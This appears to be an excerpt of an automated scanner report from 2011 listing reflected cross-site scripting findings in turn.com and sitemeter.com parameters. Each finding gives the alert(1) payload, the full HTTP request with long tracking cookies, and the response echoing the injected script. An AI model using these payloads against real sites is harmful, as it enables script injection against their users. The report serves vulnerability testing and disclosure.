Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:10:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:10:18 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 404

document.write('<img width="0" height="0" src="http://tag.admeld.com/match68af2';alert(1)//795c1f771d3?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1304734238&custom_user_segments=%2C11265%2C49026%2C49027%2C50185%2C4625%2C6551%2C10656%2C24493%2C30767%2C14769
...[SNIP]...

7.29. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa20"><script>alert(1)</script>f930ba57874 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4aa20"><script>alert(1)</script>f930ba57874&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oc31gwEy48Gj8krzQw73EBoEjcG1bqtgAhdY5dPP6ju3jDofrxsmuCTvYsogrEH2xEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oeNNhqUqWWKxkKKCASI5qJlvk_9VLZTj7a6KtdEck6wr6DFVYP-MYaTbZ4ws-0Ho4FXQPmkWV5jQz-5UiNsEEhvxiXU1a4m91l6ZX-BGzKFgQJNlreCDghOImQ4gRHHvmC5GHY348Bc_WZnzcI0VR4YvuQujLl79zvKR2S726iXFsmC2TBuMEChaKXWLs9cgZB0incj89wDLnXHT52iHDHK91RrQ27EszZdb-m7F5Z4-bue8qHNbsTHJNQl-2pL0ZG0hwnXfA6pW6CsklBZ89oOVqdwGYKKhumhVBkqqo3Ys1DU5ZHL7bkHlIMAbvVz1elMMA2GPVMOGM2LfNAYjph1mNJd5luOw6SSQJcXlXWPWtpw9QE8NMiKoMBMwAE0wE8TSsoYJA9urnx_stSxmhLBFDC-8K5inxoxE8wGPF2FyUHy8b-okk6im_ZzfepmMuVuCDmkU9WDCEErM3oXbeXprQ6Y_KEOJb4XRzmM360y1n2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqG4Cixbn_O81MTq6ekw_dLHK7vwvVc__HoujX-rjAjR3fbMQ1AjOb6Pr4jgrYjDtyFKZvpYeFbSXUE6w756Ru85tQu8lUYlKGvasVyy9QYM_B0WBtI2yRBemK9kaaXMyiY8IDVrzMbqYXE386Rx4FMoQUDpfRJBGqtBoTosifDAXjUdyE9wm6P5iu9zsNESpsE8gIIJ-aKXbtqqpxzFI5pWR1qd1OhaEJRBKLAzmtvuivo0-pmNnod7XpkHS_mmXlKfpApTInsgNHms4PzjBXGobcMMMjS9iaNWi3nIBc-51c_JNpPFelEoDpghJ_BqYKOem8Gm5pQ8dK01urDrHrdgdmyMP9WTc5eMuMfkiu-eA3R2-iCXKT-zVBd4UH-JQfMPGyLnI8FUiI8OWL7jpWFWMZXEO7OyP6JiqfKIhCGNeSxq9V44CTPsg5_09Wd_LC0N7IQXI_2WJof_8fVyPUPeh7i9wBeFplG6RcT1DtZks0sgI_IwrDwCsIS7dyiB1wNxFEDYn_de44gYmemzlgWEN26EYZGTlI4Lq2yzlU6q8m2PJX70K9ebeZIcYddS-n-jieHPeyyu_jPtNqgptNcUmlV27b50rDjEeb2aBWozrQGGuaCuFh4EzkxFsuZfPMfz1wEUboblTM7IARMSnc4jK5cJ07WSHutHBj52x3HKg14YQzFgcP1P7PF5ywq-vIL6XCfyxzfzz2QN8CpQbL5XAGhY8gq3gpxC6wpgzazfLg6emeoHtpGq3OLLxjUCIgW6QbledKeLvEwl1YIoSBsuVGm7co3E1SW7gk8dGKQMCkAGpZKu6HCuT5IaT2X4ICpHWp3U6FoQlEEosDOa2-6KcE78SWnWn9Zb9yonwZsEYlrtijogmP4oEG53-k_J-gIZe1NM6Xn8UuPCrNFrZlxt9r7cwJ0GaDm-wxC-RC7eiJ6bwabmlDx0rTW6sOset2ClcZFZrKS1YgYe9ikET6IQCL-FWN7W8AgIfx031UIybpHau0jzO5nZx7UNwc3Fcp5iybN6R1Y4JRoZKSSUbihELGr1XjgJM-yDn_T1Z38sLZJC5nnDEEYiCcbVkukitODRA_AYG_IAioGjDaP-ISMjhJsq43NtGC5w8alVd5Y3W_JVjsDeSQOTbDGWiFedYQaqonMCHOBdi8d64ncpkChEs1qKWeHlrhzJYvLK3U-X10T_mT9KtDivePIKJH6GNW46BRue32KEQLKx6RNT8qd-WiqVu80Hd_1P41FwUMGjlvQh8nhtp-zIq39ERDNVTK0IrUP-Cb_Ttx6GnOadl8nzAGhY8gq3gpxC6wpgzazfLsmMDzWYl67LQ1JPM8EK-GuiGbOzeZcMadWx6wDLtAMkQVPcBJeV_tSNAPqHn9Y96EEZ-kpDRlGoDOTjB8wgMtJHWp3U6FoQlEEosDOa2-6KjCjDtIMrxBp5mvurivaTyXBheiAjiFf5UzegIuH4PUQvF6HeYOl6yqVHlN2N9o11E9eoWE0gjO__pRMYYCNosyxH0ScxZ65NjJ8VJ6s08lUOlo3qTokJN5qzHBCHQVfE1b1R5wcKsxZf4LB5iPER8LvGXO1dAiOp7NxnU6D8mSvlFARj6k9vFL_PsqNx_NNxjUdgOuMKm6J5HDgs5y53qrZJyQVFecTwNKv5u9gz8eOfmncQzsT8YzywYTnISxIiHDXRREkq8K6_Cm8q7fOElewNe0FUGX0hxZNzX4RoxVeIITv1JR3M72AniQ6YsYfQmDHyNp520zI0HtJUF-yqs6-DDZsPbxj6Qgt5rFbggFIVrJR--A2xOt2l_LWMK7tcPGYKlDQExz7jt4XR4fyfzh6Y4d1vzmTMWcXBBW9Bwdgf7tDTwlHeQSy55kAD3G7t5jXWl2cilPuU73Pi5VvtGhRf1Bdy-tAzDWmiMKVJVbOcDmZ5ZA02huibYR0GLuxcJiSODuj1_GH4U3GxuALFLqSDArVvdqWPd1GH0CqEOJoyUsNRGCunARqHY1uoWs0abrh5VidSbzlvpfD9Bzedd0fQ1rNRAD_KliILsqERKBdpCSMMdrRB4h1pI33gcUO4C6n3gIrfyRotW5DbCfDxVHrK9OoZO1MqpMf-cD9MMeDxOsMI2HX50MkvGmhcZ7rIyyEizdkyd46QFUa8WEftR2_ranpFLDpnRWIPNGjFB85-AgYQqi3Ai0ozCyuE1PvWed1Li7rlJAMxp3uhubgLqqen5CtkmryYVTaYla4uKZOoFmK70-d6OBcdxR12uoDe_khu9L8pJ6cznlUJAYbKODyHPR4HRIlAmgaV3jBoguNFhCRsPc48rbhIrukdZcq88n7lUj82FDH58Lhzl730VWgqKvZ5Le44tUEYA8TMW7OkIBh4MsLAyfVn4fGgPUaaOfBE9jjuFfaqW11n4Z8gkLMTpxhxJkjDlSB7t0jcg9SXHexVCHumGFGU6YM9Q8y70R5LfL4BLNtWCdXTLJ8AtVcxNVvqy2ZcWAG-XpWNmIwppcdMqT-TkBX71JftijU2ptQWyE_WdHTddtiLy8MENw12owW6GlcHsm8bU3ZnaOAN1egW49z4weCLEpZILzTJU_ugwz8K5JhQ-DMDFzSxAh1-IGuEN7L1wERO08_NsneUMgmIOM-CdHdrVEKwYjsAqaPrkY0ib7YmiG6LPzAsOwDGEz0q517w5yTLXeP_QAGL2ktWSGsWvV5vNvimLfWzt63bDLkG5l0TfkVsb_CM3xVbtHIkji0PAVOv_qkrD2HBM43r-YwbWOT7PPhjZcBn; fc=xTIbWrtivElq1tUc5tWjJbVvdU6bSGa3te68hWgJRC-cCsKuP_sD1eNstKEGmgqs2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtlsRj4DgPxbC0CSbEhxctH3CNlUYOl7xObpPSA_AkNKQIxazefuTbu8OVIWB1hgh0UuQ5WvHyA5163u2A0m1Vwyua7r46nuxletASYocQS1CQ; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C4%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15093%7C15093%7C15093%7C15092%7C15085%7C15093%7C15088%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7Cundefined%7C15093; rv=1; pf=iWpxAKbe6dXKyG4kI9LU0TQr6_aV_hWXTsEtRZOgJfGU4lRMcL7m1vqUsiBTZr7RMO7qqq5hFl3uSsnbrtm0AcdiicNNmmE_aI2n_-oR-aSbxFtxY6VXGMaWedmSR5_sZf2e9JPx2W0_L4Yfnte0zVeMKR4WkXgHWfiVoBwANMcKjySply9svk7Zjz1cpf4Bzb5Tt0dQE7jHQc5epS0VRkVIATW7cLC_dfDNtRc55AaPTS0-vn8aJUl_hlPyvPOOtdzUdOc0k8NWJBJOGBK9QZ-lyGHiRYTkQQvITxdIImFBY0mOsZX2h2BPTttOm1Xbc_h5HhDpjIQwIe1q44DX0AG9Q25Hr0TsSXGFhqkVSyhYOo9e-u-S9OqoU54oGyc4eKOevxUxpxyyPlhnEBc9g-hyXq1vQkw6vFA4jx6_C50EFNKdwIC6nJFecFHEvdhoGJRMajhWfp6v36qtQgLomoeO7STcnXJMYxdVzVjC-m3FgjKTWuNYEjtqCRtgViTecSMM7QYznF7B2nS665hlYvalAnAOTSVOdM3F_f9snK6TMaUUr7mVR5XLQhBYqSHioDxtZIA_eLx2S_pX-oLVM25XRL8B07irNS8qlr7ekd1rQ4U8f3BvpBt3a5uXz3WYV2KppMfhFPhtONNbwIev0vTu8RLoHZ9dIHokovwqrwnQOji_IKtCoOfkmPA2GXNZsyEfLkFse-VL4nLB3SN-v7t_hIXf4yquNhsR3qlOcolIxbr8CAsvJn7s9pVERGCv2XgylrDt9qGvfTGyLpv8A2Yde38jaUPKbpopJkL6ubTp98EvwAGJDQCxmpV8QykkAj4Q6BHLoyve-_dzLlVIAQ06eq6t9RXgewAoL0bGKZkTVz9HyqK6lzJ3KzNn4XmhjX4azvEIVOD1XypL8BZ0ZYO5D-OZkr4-zDlwdvTf-FzZ62NZ2vx0847xQd2HiPAVs-Npo0_YWtPEzUNCMo2pgn80M8Yib7rvW7WlT65pK2uB1RKuJg5FS_p7z-IismFNJmnxdDECCARlTTFrZxwoda_KzBssnjAUyi1EkYCCG0j3pThGfwq5Uq0-f6AalaoOF3KASDJInaJTcmELg2xEMdu-KSTPHDRv4T_9SdgFPrBSblm3JwjUk_JyuCwxhJUXK4jbld-yDkb4tl03dxtcWcjoFV_QwjIpyolfrSfHGfHNKI-XeEZ9qQdvn_DOZqfwEmMfhowJdCoCPDrXPF5h1_V_4ID4A02bJp1qiRkqtiXoxNNyV8n3Mw6XuEZmbbAY2KiuuMMPoqqkC11UJ3f0ilmAcq-IQaSbZrb-8189lloCC94FRBPLoiryHccxbJkdIF-ULo-MIaIFfBzk_4K1fDEHbIdULrPVeP4f9gjGzYpqhRCV1kZeWvR_-f0hYA8Lw75Zvr3cnox-DbW0vtRfJ-SLGp5Ew4CpDqVMcjykIV5WgKm8ByrHbLc1WRYSLLdTRJiHTibF2wHwHq4LSkiTl7JnHCAEbLHNUgk8FLdI5Y5GIzEH5KXeZO6VoSww8QwnzpHYjcfw3UjUUBIE5Dj73rTqmIT7eerZylEPy4vu97TRJwAWQNtkfqiEAfr4_0EU; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:39 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:38 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2447822087988458761&fpid=4aa20"><script>alert(1)</script>f930ba57874&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

7.30. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801c8"><script>alert(1)</script>131f7da3ea4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=801c8"><script>alert(1)</script>131f7da3ea4&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oc31gwEy48Gj8krzQw73EBoEjcG1bqtgAhdY5dPP6ju3jDofrxsmuCTvYsogrEH2xEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oeNNhqUqWWKxkKKCASI5qJlvk_9VLZTj7a6KtdEck6wr6DFVYP-MYaTbZ4ws-0Ho4FXQPmkWV5jQz-5UiNsEEhvxiXU1a4m91l6ZX-BGzKFgQJNlreCDghOImQ4gRHHvmC5GHY348Bc_WZnzcI0VR4YvuQujLl79zvKR2S726iXFsmC2TBuMEChaKXWLs9cgZB0incj89wDLnXHT52iHDHK91RrQ27EszZdb-m7F5Z4-bue8qHNbsTHJNQl-2pL0ZG0hwnXfA6pW6CsklBZ89oOVqdwGYKKhumhVBkqqo3Ys1DU5ZHL7bkHlIMAbvVz1elMMA2GPVMOGM2LfNAYjph1mNJd5luOw6SSQJcXlXWPWtpw9QE8NMiKoMBMwAE0wE8TSsoYJA9urnx_stSxmhLBFDC-8K5inxoxE8wGPF2FyUHy8b-okk6im_ZzfepmMuVuCDmkU9WDCEErM3oXbeXprQ6Y_KEOJb4XRzmM360y1n2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqG4Cixbn_O81MTq6ekw_dLHK7vwvVc__HoujX-rjAjR3fbMQ1AjOb6Pr4jgrYjDtyFKZvpYeFbSXUE6w756Ru85tQu8lUYlKGvasVyy9QYM_B0WBtI2yRBemK9kaaXMyiY8IDVrzMbqYXE386Rx4FMoQUDpfRJBGqtBoTosifDAXjUdyE9wm6P5iu9zsNESpsE8gIIJ-aKXbtqqpxzFI5pWR1qd1OhaEJRBKLAzmtvuivo0-pmNnod7XpkHS_mmXlKfpApTInsgNHms4PzjBXGobcMMMjS9iaNWi3nIBc-51c_JNpPFelEoDpghJ_BqYKOem8Gm5pQ8dK01urDrHrdgdmyMP9WTc5eMuMfkiu-eA3R2-iCXKT-zVBd4UH-JQfMPGyLnI8FUiI8OWL7jpWFWMZXEO7OyP6JiqfKIhCGNeSxq9V44CTPsg5_09Wd_LC0N7IQXI_2WJof_8fVyPUPeh7i9wBeFplG6RcT1DtZks0sgI_IwrDwCsIS7dyiB1wNxFEDYn_de44gYmemzlgWEN26EYZGTlI4Lq2yzlU6q8m2PJX70K9ebeZIcYddS-n-jieHPeyyu_jPtNqgptNcUmlV27b50rDjEeb2aBWozrQGGuaCuFh4EzkxFsuZfPMfz1wEUboblTM7IARMSnc4jK5cJ07WSHutHBj52x3HKg14YQzFgcP1P7PF5ywq-vIL6XCfyxzfzz2QN8CpQbL5XAGhY8gq3gpxC6wpgzazfLg6emeoHtpGq3OLLxjUCIgW6QbledKeLvEwl1YIoSBsuVGm7co3E1SW7gk8dGKQMCkAGpZKu6HCuT5IaT2X4ICpHWp3U6FoQlEEosDOa2-6KcE78SWnWn9Zb9yonwZsEYlrtijogmP4oEG53-k_J-gIZe1NM6Xn8UuPCrNFrZlxt9r7cwJ0GaDm-wxC-RC7eiJ6bwabmlDx0rTW6sOset2ClcZFZrKS1YgYe9ikET6IQCL-FWN7W8AgIfx031UIybpHau0jzO5nZx7UNwc3Fcp5iybN6R1Y4JRoZKSSUbihELGr1XjgJM-yDn_T1Z38sLZJC5nnDEEYiCcbVkukitODRA_AYG_IAioGjDaP-ISMjhJsq43NtGC5w8alVd5Y3W_JVjsDeSQOTbDGWiFedYQaqonMCHOBdi8d64ncpkChEs1qKWeHlrhzJYvLK3U-X10T_mT9KtDivePIKJH6GNW46BRue32KEQLKx6RNT8qd-WiqVu80Hd_1P41FwUMGjlvQh8nhtp-zIq39ERDNVTK0IrUP-Cb_Ttx6GnOadl8nzAGhY8gq3gpxC6wpgzazfLsmMDzWYl67LQ1JPM8EK-GuiGbOzeZcMadWx6wDLtAMkQVPcBJeV_tSNAPqHn9Y96EEZ-kpDRlGoDOTjB8wgMtJHWp3U6FoQlEEosDOa2-6KjCjDtIMrxBp5mvurivaTyXBheiAjiFf5UzegIuH4PUQvF6HeYOl6yqVHlN2N9o11E9eoWE0gjO__pRMYYCNosyxH0ScxZ65NjJ8VJ6s08lUOlo3qTokJN5qzHBCHQVfE1b1R5wcKsxZf4LB5iPER8LvGXO1dAiOp7NxnU6D8mSvlFARj6k9vFL_PsqNx_NNxjUdgOuMKm6J5HDgs5y53qrZJyQVFecTwNKv5u9gz8eOfmncQzsT8YzywYTnISxIiHDXRREkq8K6_Cm8q7fOElewNe0FUGX0hxZNzX4RoxVeIITv1JR3M72AniQ6YsYfQmDHyNp520zI0HtJUF-yqs6-DDZsPbxj6Qgt5rFbggFIVrJR--A2xOt2l_LWMK7tcPGYKlDQExz7jt4XR4fyfzh6Y4d1vzmTMWcXBBW9Bwdgf7tDTwlHeQSy55kAD3G7t5jXWl2cilPuU73Pi5VvtGhRf1Bdy-tAzDWmiMKVJVbOcDmZ5ZA02huibYR0GLuxcJiSODuj1_GH4U3GxuALFLqSDArVvdqWPd1GH0CqEOJoyUsNRGCunARqHY1uoWs0abrh5VidSbzlvpfD9Bzedd0fQ1rNRAD_KliILsqERKBdpCSMMdrRB4h1pI33gcUO4C6n3gIrfyRotW5DbCfDxVHrK9OoZO1MqpMf-cD9MMeDxOsMI2HX50MkvGmhcZ7rIyyEizdkyd46QFUa8WEftR2_ranpFLDpnRWIPNGjFB85-AgYQqi3Ai0ozCyuE1PvWed1Li7rlJAMxp3uhubgLqqen5CtkmryYVTaYla4uKZOoFmK70-d6OBcdxR12uoDe_khu9L8pJ6cznlUJAYbKODyHPR4HRIlAmgaV3jBoguNFhCRsPc48rbhIrukdZcq88n7lUj82FDH58Lhzl730VWgqKvZ5Le44tUEYA8TMW7OkIBh4MsLAyfVn4fGgPUaaOfBE9jjuFfaqW11n4Z8gkLMTpxhxJkjDlSB7t0jcg9SXHexVCHumGFGU6YM9Q8y70R5LfL4BLNtWCdXTLJ8AtVcxNVvqy2ZcWAG-XpWNmIwppcdMqT-TkBX71JftijU2ptQWyE_WdHTddtiLy8MENw12owW6GlcHsm8bU3ZnaOAN1egW49z4weCLEpZILzTJU_ugwz8K5JhQ-DMDFzSxAh1-IGuEN7L1wERO08_NsneUMgmIOM-CdHdrVEKwYjsAqaPrkY0ib7YmiG6LPzAsOwDGEz0q517w5yTLXeP_QAGL2ktWSGsWvV5vNvimLfWzt63bDLkG5l0TfkVsb_CM3xVbtHIkji0PAVOv_qkrD2HBM43r-YwbWOT7PPhjZcBn; fc=xTIbWrtivElq1tUc5tWjJbVvdU6bSGa3te68hWgJRC-cCsKuP_sD1eNstKEGmgqs2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtlsRj4DgPxbC0CSbEhxctH3CNlUYOl7xObpPSA_AkNKQIxazefuTbu8OVIWB1hgh0UuQ5WvHyA5163u2A0m1Vwyua7r46nuxletASYocQS1CQ; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C4%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15093%7C15093%7C15093%7C15092%7C15085%7C15093%7C15088%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7Cundefined%7C15093; rv=1; pf=iWpxAKbe6dXKyG4kI9LU0TQr6_aV_hWXTsEtRZOgJfGU4lRMcL7m1vqUsiBTZr7RMO7qqq5hFl3uSsnbrtm0AcdiicNNmmE_aI2n_-oR-aSbxFtxY6VXGMaWedmSR5_sZf2e9JPx2W0_L4Yfnte0zVeMKR4WkXgHWfiVoBwANMcKjySply9svk7Zjz1cpf4Bzb5Tt0dQE7jHQc5epS0VRkVIATW7cLC_dfDNtRc55AaPTS0-vn8aJUl_hlPyvPOOtdzUdOc0k8NWJBJOGBK9QZ-lyGHiRYTkQQvITxdIImFBY0mOsZX2h2BPTttOm1Xbc_h5HhDpjIQwIe1q44DX0AG9Q25Hr0TsSXGFhqkVSyhYOo9e-u-S9OqoU54oGyc4eKOevxUxpxyyPlhnEBc9g-hyXq1vQkw6vFA4jx6_C50EFNKdwIC6nJFecFHEvdhoGJRMajhWfp6v36qtQgLomoeO7STcnXJMYxdVzVjC-m3FgjKTWuNYEjtqCRtgViTecSMM7QYznF7B2nS665hlYvalAnAOTSVOdM3F_f9snK6TMaUUr7mVR5XLQhBYqSHioDxtZIA_eLx2S_pX-oLVM25XRL8B07irNS8qlr7ekd1rQ4U8f3BvpBt3a5uXz3WYV2KppMfhFPhtONNbwIev0vTu8RLoHZ9dIHokovwqrwnQOji_IKtCoOfkmPA2GXNZsyEfLkFse-VL4nLB3SN-v7t_hIXf4yquNhsR3qlOcolIxbr8CAsvJn7s9pVERGCv2XgylrDt9qGvfTGyLpv8A2Yde38jaUPKbpopJkL6ubTp98EvwAGJDQCxmpV8QykkAj4Q6BHLoyve-_dzLlVIAQ06eq6t9RXgewAoL0bGKZkTVz9HyqK6lzJ3KzNn4XmhjX4azvEIVOD1XypL8BZ0ZYO5D-OZkr4-zDlwdvTf-FzZ62NZ2vx0847xQd2HiPAVs-Npo0_YWtPEzUNCMo2pgn80M8Yib7rvW7WlT65pK2uB1RKuJg5FS_p7z-IismFNJmnxdDECCARlTTFrZxwoda_KzBssnjAUyi1EkYCCG0j3pThGfwq5Uq0-f6AalaoOF3KASDJInaJTcmELg2xEMdu-KSTPHDRv4T_9SdgFPrBSblm3JwjUk_JyuCwxhJUXK4jbld-yDkb4tl03dxtcWcjoFV_QwjIpyolfrSfHGfHNKI-XeEZ9qQdvn_DOZqfwEmMfhowJdCoCPDrXPF5h1_V_4ID4A02bJp1qiRkqtiXoxNNyV8n3Mw6XuEZmbbAY2KiuuMMPoqqkC11UJ3f0ilmAcq-IQaSbZrb-8189lloCC94FRBPLoiryHccxbJkdIF-ULo-MIaIFfBzk_4K1fDEHbIdULrPVeP4f9gjGzYpqhRCV1kZeWvR_-f0hYA8Lw75Zvr3cnox-DbW0vtRfJ-SLGp5Ew4CpDqVMcjykIV5WgKm8ByrHbLc1WRYSLLdTRJiHTibF2wHwHq4LSkiTl7JnHCAEbLHNUgk8FLdI5Y5GIzEH5KXeZO6VoSww8QwnzpHYjcfw3UjUUBIE5Dj73rTqmIT7eerZylEPy4vu97TRJwAWQNtkfqiEAfr4_0EU; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:40 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:40 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4010451028652069296&fpid=4&nu=n&t=&sp=801c8"><script>alert(1)</script>131f7da3ea4&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

7.31. http://s28.sitemeter.com/js/counter.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 695f8'%3balert(1)//5ff8671c168 was submitted in the site parameter. This input was echoed as 695f8';alert(1)//5ff8671c168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/counter.asp?site=s28japanator695f8'%3balert(1)//5ff8671c168 HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
